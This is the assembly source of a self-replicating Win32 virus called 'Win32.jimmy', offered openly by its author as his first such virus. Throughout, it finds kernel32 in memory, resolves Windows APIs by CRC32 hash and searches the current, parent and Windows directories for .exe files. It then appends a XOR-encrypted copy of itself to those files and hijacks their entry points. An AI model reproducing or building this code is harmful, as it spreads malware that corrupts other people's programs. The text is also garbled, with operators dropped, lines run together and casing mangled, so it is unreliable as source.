Win32.jimmy by sst@hablas.com
;
Infektion BEI WIN95 / 98 / ME, WINNT4.0, WINNT2000
Variable xor encryption
Append Infector
;
; Yes, this is my first w32.virus
.586p
.MODEL FLAT
Jumps
.radix 16
EXTRN EXITPROCESS: PROC
.DATA
Data:
Filemask DB '* .exe', 0
FileHandle DD 0H
Newsize DD 0H
AlignReg1 DD 0H
Infcounter DD 0H
APICRC32 DD 0H
TRASH2 DD 0H
DirectoryBuffer DB 255D DUP (0H)
Kernelmz DD 0H
OTABLEVA DD 0H
MapHandle DD 0H
OldDirectory DB 255D DUP (0H)
K32TRYS DD 0H
Counter dw 0h
AlignReg2 DD 0H
Apinames:
DD 0FE248274H
DD 08C892DDFH
DD 0ebc6c18bh
DD 0B2DBD7DCH
DD 0613FD7BAH
DD 0AE17EBEFH
DD 096B2D96CH
DD 0AA700106H
DD 094524B42H
DD 0797B49ECH
DD 0C200BE21H
DD 068624A9DH
ATABLEVA DD 0H
Tempapisearch2 DD 0H
APIOFFSETS:
XGetWindowsDirectorya DD 0H
XcreateFilea DD 0H
XGetcurrentDirectorya DD 0H
XSetcurrentDirectorya DD 0H
XGettickCount DD 0H
Xfindfirstfilea DD 0H
XcreateFilemappinga DD 0H
XFindNextFilea DD 0H
XunmapViewoffile DD 0H
XMapViewOffile DD 0H
XFindClose DD 0H
XCloseHandle DD 0H
Tempapi DD 0H
KERNELPE DD 0H
Randval DD 0H
FindHandle DD 0H
Oldeip DD 0H
NEWEIP DD 0H
MapAddress DD 0H
Alte DD 0H
NTABLEVA DD 0H
TRASH1 DD 0H
Filetime Struc
FT_DWLOWDATETIME DD?
FT_DWHIGHDATETIME DD?
Filetime Ends
Win32_find_data label Byte
WFD_DWFILEATTRIBUTES DD?
WFD_FTCREATIONTIME FileTime?
WFD_FTLASTACCESSTIME FileTime?
WFD_FTLASTWRITETIME FILETIME?
WFD_NFILESIGH DD?
WFD_NFILESZELOW DD?
WFD_DWRESERVED0 DD?
WFD_DWRESERVED1 DD?
WFD_SZFILENAME DB 260D DUP (?)
Wfd_szalternateFileName DB 13 DUP (?)
WFD_SZALTERNATEENDING DB 03 DUP (?)
GROESE EQU (Offset Endvirus - Offset Virus)
Numberofapis EQU 12
Encrypted = (Offset endofcrypt - offset eNCGO) / 2) 1.code
Viruscode:
Virus:
Call delta
DW 15662D
DW 31058D
CodeOfcrypt dw 0h
Delta:
MOV EDX, DWORD PTR [ESP]
Inc ESP
Add ESP, 3D
Sub EDX, (Offset Delta - 6)
MOV EBP, EDX
MOV EDI, EBP
OR EDI, EDI
JZ ENCGO
Mov Edx, Encrypted
Lea ECX, [EBP ENCGO]
Encgoloop:
XOR BX, Word PTR [EBP CodeOfCrypt]
Mov Word PTR [ECX], BX
Add ECX, 2
Dec edx
JNZ Encgoloop
Encgo:
JMP kernelsearchstart
Nokernel:
MOV EBX, DWORD PTR [EBP OLDEIP]
MOV DWORD PTR [EBP RETEIP], EBX
MOV EDI, DWORD PTR [EBP ALTE]
MOV DWORD PTR [EBP RETBASE], EDI
MOV DWORD PTR [EBP TRASH2], EDI
MOV EDI, DWORD PTR [EBP ALTE]
MOV DWORD PTR [EBP RETBASE], EDI
Executehost:
CMP EBP, 0
Je firstgenhost
Mov EBX, 12345678H
Org $ -4
Reteip DD 0H
Add ebx, 12345678H
Org $ -4
RetBase DD 0H
Push EBX
RET
FIRSTGENHOST:
SUB EBX, EBX
Push EBX
Call EXITPROCESS
Infectexe:
Call getRand
MOV EBX, DWORD PTR [EBP RANDVAL]
MOV Word PTR [EBP CodeOfCrypt], BX
MOV ECX, -49695D
Add ECX, 49695D
Add ECX, DWORD PTR [EBP MAPADDRESS]
MOV EAX, [ECX 3CH]
Add Eax, ECX
Add Eax, 3ch
Mov Edx, [EAX]
Sub Eax, 3ch
MOV ECX, DWORD PTR [EBP WFD_NFILESZELOW]
MOV DWORD PTR [EBP AlignReg2], -1
And DWORD PTR [EBP AlignReg2], EDX
SBB EAX, 2D
Add ECX, GROESE
MOV DWORD PTR [EBP AlignReg1], 0
XOR DWORD PTR [EBP AlignReg1], ECX
Call align
And ECX, 0
Add ECX, DWORD PTR [EBP AlignReg1]
MOV DWORD PTR [EBP NEWSIZE], ECX
Pushhad
Call unmapfile2
Popad
MOV DWORD PTR [EBP WFD_NFILESZELOW], ECX
Call CreateMap
JC NOEXE
Push DWORD PTR [EBP MAPADDRESS]
POP ESI
MOV EDX, DWORD PTR [ESI 3CH]
Add Edx, ESI
Push Edx
POP Esimov EBX, 0
MOV BX, Word PTR [ESI 06H]
MOV ECX, 1D
SUB EBX, ECX
Imul EBX, EBX, 28H
Add EDX, 120D
Add Edx, EBX
MOV EAX, DWORD PTR [ESI 74H]
SHL EAX, 3
Add Edx, EAX
Mov Eax, DWORD PTR [ESI 28H]
MOV DWORD PTR [EBP OLDEIP], EAX
MOV ECX, DWORD PTR [ESI 34H]
Push ECX
POP DWORD PTR [EBP ALTE]
PUSH 0
POP ECX
Add ECX, [EDX 10h]
Push ECX
POP EBX
Add Edx, 14h
Add ECX, [EDX]
Sub EDX, 14H
Push ECX
Push EBX
POP EAX
Add Eax, [EDX 0CH]
MOV [ESI 28H], EAX
Mov DWORD PTR [EBP NEWEIP], EAX
Sub Eax, EAX
Add Eax, [EDX 10h]
Push EAX
Add Eax, Groese
Push EAX
POP DWORD PTR [EBP AlignReg1]
Push DWORD PTR [ESI 3CH]
POP DWORD PTR [EBP AlignReg2]
Call align
Sub Eax, EAX
Add Eax, DWORD PTR [EBP ALIGNREG1]
MOV DWORD PTR [EDX 10h], 0H
Add DWORD PTR [EDX 10H], EAX
POP EAX
Add Eax, Groese
Mov DWORD PTR [EDX 08H], 0
Add DWORD PTR [EDX 08H], EAX
MOV EAX, DWORD PTR [EDX 0CH]
Add Eax, DWORD PTR [EDX 10h]
MOV DWORD PTR [ESI 50H], 0H
Add DWORD PTR [ESI 50H], EAX
OR DWORD PTR [EDX 24H], 0A0000020H
MOV DWORD PTR [ESI 4CH], 'Jimm'
POP EDI
Add Edi, DWORD PTR [EBP MAPADDRESS]
MOV ECX, (Offset Encgo - Offset Virus)
Lea ESI, [EBP VIRUS]
Appendloop:
REP MOVSB
Push Encrypted
POP ECX
Cryptappendloop:
Lodsw
XOR AX, Word PTR [EBP CodeOfCrypt]
Stosw
SUB ECX, 1
JNZ CryptappendLoop
MOV EDX, (-1D xor 27D)
XOR EDX, 27D
And EDX, DWORD PTR [EBP Infcounter]
SUB EDX, 1D
ROL EAX, 16D
Push Edx
POP DWORD PTR [EBP Infcounter]
CLC
RET
NOEXE:
STC
RET
Infectfile:
CMP DWORD PTR [EBP WFD_NFILESZELOW], 44000D
Jbe noinfection
CMP DWORD PTR [EBP WFD_NFILESIGHIGH], 0
JNE NOINFECTIONCALL OPENFILE
JC NOINFECTION
MOV EAX, DWORD PTR [EBP MAPADDRESS]
CMP Word PTR [EAX], 'ZM'
Je Goodfile
Push 28785d
POP ECX
CMP ECX, 28785D
JE NotaGoodFile
Goodfile:
CMP Word PTR [EAX 3CH], 0H
JNE _NOTAGOODFILE
JMP NotaGoodFile
_NOTAGOODFILE:
XOR EBX, EBX
Add ebx, [EAX 3CH]
CMP DWORD PTR [EBP WFD_NFILESZELOW], EBX
JB NotaGoodFile
Add Ebx, EAX
CMP Word PTR [EBX], 'EP'
Je goodfile2
Push 24945D
POP ECX
CMP ECX, 24945D
JE NotaGoodFile
Goodfile2:
CMP DWORD PTR [EBX 4CH], 'Jimm'
JZ NOTAGOODFILE
MOV CX, Word PTR [EBX 16h]
RCL EDX, 12D
And CX, 0F000H
CMP CX, 02000H
JE NotaGoodFile
MOV CX, Word PTR [EBX 16h]
And CX, 00002H
CMP CX, 00002H
JNE NOTAGOODFILE
Call infectexe
JC NOINFECTION
And EDX, EBX
NOTAGOODFILE:
Call unmapfile
NOINFECTION:
RET
Outbreak:
MOV ESI, DWORD PTR [EBP OLDEIP]
MOV DWORD PTR [EBP Reteip], ESI
MOV EBX, DWORD PTR [EBP ALTE]
MOV DWORD PTR [EBP RETBASE], EBX
Call InfectCurdir
MOV EAX, EBP
Add Eax, Offset Olddirectory
Push EAX
MOV EAX, (255D XOR 32D)
XOR EAX, 32D
Push EAX
Call DWORD PTR [EBP XGetcurrentDirectorya]
Lea Edx, [EBP Olddirectory]
MOV EBX, EDX
TRAVELDOWNLOOP1:
Inc EDX
CMP Byte Ptr [EDX], 0
JNE TravelDownloadNLOOP1
TRAVELDOWNLOOP2:
Add Edx, -1D
CMP BYTE PTR [EDX], '/'
JNE TravelDownNext
MOV BYTE PTR [EDX], 0
Push EBX
Call DWORD PTR [EBP XSETCURRENTDIRECTORYA]
Pushhad
Call InfectCurdir
Popad
MOV BYTE PTR [EDX], '/'
TravelDownNext:
CMP EDX, EBX
JNE TravelDownLoop2
MOV EAX, (255D 16D)
SUB EAX, 16D
Push EAX
Lea ECX, [EBP DIRECTORYBUFFER]
Push ECX
Call DWORD PTR [EBP XGetWindowsDirectorya]
XCHG ECX, EDX
Push EDXCALL DWORD PTR [EBP XSETCURRENTDIRECTOREA]
Call InfectCurdir
Lea Edx, [EBP Olddirectory]
Push Edx
Call DWORD PTR [EBP XSETCURRENTDIRECTORYA]
JMP EXECUTEHOST
Getapis:
Push Numberofapis
POP EAX
Mov ESI, 37168D
SUB ESI, 37168D
Add ESI, DWORD PTR [EBP KERNELPE]
Mov EDI, [ESI 78H]
Add Edi, [EBP KERNELMZ]
Add EDI, 28D
MOV ESI, DWORD PTR [EDI]
Add ESI, [EBP KERNELMZ]
MOV DWORD PTR [EBP ATABLEVA], ESI
Inc EDI
Add EDI, 3D
MOV ESI, DWORD PTR [EDI]
Add EDI, 4D
Add ESI, [EBP KERNELMZ]
MOV DWORD PTR [EBP NTABLEVA], ESI
MOV ESI, DWORD PTR [EDI]
Add ESI, [EBP KERNELMZ]
MOV DWORD PTR [EBP OTABLEVA], ESI
LEA ECX, [EBP APINAMES]]
MOV ESI, EBP
Add ESI, Offset Apioffsets
Getapisloop:
And Word PTR [EBP Counter], 0H
Inc ECX
Add ECX, 3D
XOR EDX, EDX
Add Edx, DWORD PTR [EBP TEMPAPI]
MOV DWORD PTR [ESI], EDX
Inc ESI
Add ESI, 3D
Dec EAX
JNZ getapisloop
JMP Outbreak
CRC32:
Pushhad
MOV EDI, -28264D
Add EDI, 28264D
Add Edi, ESI
PUSH 0
POP EBX
Add ebx, EDI
LenCrc:
SUB EBX, -1D
CMP BYTE PTR [EBX], 0
JNE Lencrc
SUB EBX, EDI
MOV ESI, EBX
Add ESI, 1D
CLD
Mov Eax, 16859d
SUB EAX, 16859D
Dec EAX
Sub eax, 0d
Mov Edx, EAX
Nextbytecrc:
MOV EBX, -6128D
Add EBX, 6128D
SUB ECX, ECX
MOV BL, BYTE PTR [EDI]
Inc EDI
XOR BL, Al
Mov Al, AH
MOV AH, DL
MOV DL, DH
MOV DH, 8
NextbitCrc:
SHR CX, 1
RCR BX, 1
JNC NOCRC
XOR BX, 08320H
XOR CX, 0EDB8H
NOCRC:
DEC DH
JNZ nextbitCrc
XOR EAX, EBX
XOR Edx, ECX
Dec ESI
Jnz nextbytecrc
Not Edx
NOT EAX
MOV EBX, EDX
ROL EBX, 16D
MOV BX, AX
MOV DWORD PTR [EBP APICRC32], EBX
Popad
RET
Searchapi1:
Pushhad
PUSH 0
POP EBX
Add EBX, DWORD PTR [EBP NTABLEVA]
And DWORD PTR [EBP TRASH1], EBXSAR EDX, 10D
SearchNextapi1:
Push EBX
MOV EAX, DWORD PTR [EBX]
Add Eax, [EBP KERNELMZ]
Push EAX
POP EBX
Push EBX
POP ESI
PUSH ESI
POP DWORD PTR [EBP TEMPAPISEARCH]
Push ECX
CLD
Call CRC32
Mov Eax, 52825D
SUB EAX, 52825D
Add Eax, DWORD PTR [EBP APICRC32]
SUB EAX, DWORD PTR [ECX]
CMP EAX, 0
Je Foundapi1
Apinotfound:
POP ECX
MOV ESI, 0
Add ESI, DWORD PTR [EBP TEMPAPISEARCH2]
POP EBX
Inc EBX
Add EBX, 3D
Add Word PTR [EBP Counter], 1H
CMP Word PTR [EBP Counter], 2002H
Je notfoundapi1
JMP SearchNextapi1
FOUNDAPI1:
Add ESP, 8D
XOR EDX, EDX
MOV DX, Word PTR [EBP Counter]
CLC
RCL EDX, 1
Add Edx, DWORD PTR [EBP OTABLEVA]
Push Edx
POP EBX
Movzx EDX, Word PTR [EBX]
CLC
RCL EDX, 2H
Add Edx, DWORD PTR [EBP ATABLEVA]
MOV EBX, DWORD PTR [EBP KERNELMZ]
Add Ebx, DWORD PTR [EDX]
MOV DWORD PTR [EBP TEMPAPI], -1
And DWORD PTR [EBP TEMPAPI], EBX
CMP Byte PTR [EBX], 0CCH
JE EXECUTEHOST
Popad
RET
Notfoundapi1:
POP ESI
Popad
JMP EXECUTEHOST
FINDNEXTFILEPROC:
Call ClearoldData
MOV EDX, EBP
Add Edx, Offset Win32_Find_Data
Push Edx
MOV EBX, DWORD PTR [EBP FINDHANDLE]
Push EBX
Call DWORD PTR [EBP XFINDNEXTFILEA]
RET
ClearoldData:
Pushhad
Push 276D
POP EAX
Lea Edx, [EBP WFD_SZFILENAME]
ClearoldData2:
MOV BYTE PTR [EDX], 0H
Dec EAX
Jnz ClearoldData2
Popad
RET
FindfirstFileProc:
Call ClearoldData
Lea Edx, [EBP WIN32_FIND_DATA]
Push Edx
Push EBX
Call DWORD PTR [EBP XFINDFIRSTFILEA]
Push EAX
POP DWORD PTR [EBP FindHandle]
RET
Align:
Pushhad
Mov EDX, 0
MOV EAX, DWORD PTR [EBP AlignReg1]
MOV ECX, DWORD PTR [EBP AlignReg2]
Div ECX
INC EAX
Mul ECX
MOV DWORD PTR [EBP AlignReg1], 0HADD DWORD PTR [EBP AlignReg1], EAX
Popad
RET
DB 'Win32.Jimmy - SST @ hablas.com', 0
OpenFile:
PUSH 0
PUSH 0
Push 3
PUSH 0
Push 1
MOV EBX, 80000000h OR 40000000H
Push EBX
Lea EBX, WFD_SZFILENAME
Add EBX, EBP
Push EBX
Sal ECX, 28D
Call DWORD PTR [EBP XCREATEFILEA]
Add Eax, 1
JZ Closed
Dec EAX
Mov DWORD PTR [EBP FILEHANDLE], EAX
CreateMap:
MOV ECX, DWORD PTR [EBP WFD_NFILESZELOW]
Push ECX
And EDX, 0
Push Edx
Add Ebx, EAX
Push ECX
Push Edx
Push 00000004H
Push Edx
Push DWORD PTR [EBP FILEHANDLE]
Call DWORD PTR [EBP XCREATEFILEMAPPINGA]
MOV DWORD PTR [EBP MAPHANDLE], -1
And DWORD PTR [EBP MAPHANDLE], EAX
POP ECX
OR EAX, EAX
JZ Closefile
PUSH 0
POP EDX
Push ECX
Push Edx
Push Edx
Push 2H
Push DWORD PTR [EBP MAPHANDLE]
Call DWORD PTR [EBP XMapViewOffile]
Test Eax, EAX
JZ unmapfile
MOV DWORD PTR [EBP MAPADDRESS], -1
And DWORD PTR [EBP MAPADDRESS], EAX
CLC
RET
Unmapfile:
Call unmapfile2
Closefile:
Push DWORD PTR [EBP FILEHANDLE]
Call [EBP XCloseHandle]
Closed:
STC
RET
Unmapfile2:
Push DWORD PTR [EBP MAPADDRESS]
Call Dword PTR [EBP XUNMAPVIEWOFFILE]
Push DWORD PTR [EBP MAPHANDLE]
Call DWORD PTR [EBP XCloseHandle]
RET
InfectCurdir:
MOV [EBP Infcounter], 2D
MOV EBX, Offset Filemask
Add EBX, EBP
Call FindfirstFileProc
INC EAX
JZ endinfectcurdir
InfectCurdirfile:
Call infectfile
SUB ECX, ECX
Add ECX, DWORD PTR [EBP Infcounter]
Inc ECX
Dec ECX
JZ endinfectcurdir
Call FindNextFileProc
CMP Eax, 0H
JNE InfectCurdirfile
EndinfectCurdir:
Push DWORD PTR [EBP FINDHANDLE]
Call DWORD PTR [EBP XFindClose]
RET
KernelSearchstart:
MOV EAX, DWORD PTR [ESP]
SHR EAX, 16D
ROL EAX, 16D
MOV DWORD PTR [EBP K32TRYS], 4H
GK1:
MOV EDX, -1D
And EDX, DWORD PTR [EBP K32TRYS]]
OR EDX, EDX
JZ Nokernel
CMP Word PTR [EAX], 'ZM'
JE CHECKPE
GK2:
MOV EBX, (65536D 32D)
SUB EBX, 32D
Sub Eax, EBX
Dec DWORD PTR [EBP K32TRYS]
JMP GK1
CHECKPE:
Mov Edx, [EAX 3CH]
XCHG EDX, EAX
Add Eax, EDX
XCHG EDX, EAX
Movzx EBX, Word PTR [EDX]
SUB EBX, 'EP'
JZ Checkdll
JMP GK2
Checkdll:
KernelFound:
MOV DWORD PTR [EBP KERNELMZ], -1
NOT ECX
And DWORD PTR [EBP KERNELMZ], EAX
MOV DWORD PTR [EBP KERNELPE], EDX
Lea Eax, [EBP Offset GetApis]
Push EAX
RET
Getrand:
Pushhad
Add Edx, DWORD PTR [EBP RANDVAL]
Call DWORD PTR [EBP XGETTICKCOUNT]
Add Edx, EAX
Mov DWORD PTR [EBP RANDVAL], 0
Add DWORD PTR [EBP RANDVAL], EDX
Popad
RET
Endofcrypt:
Endvirus:
End viruscode
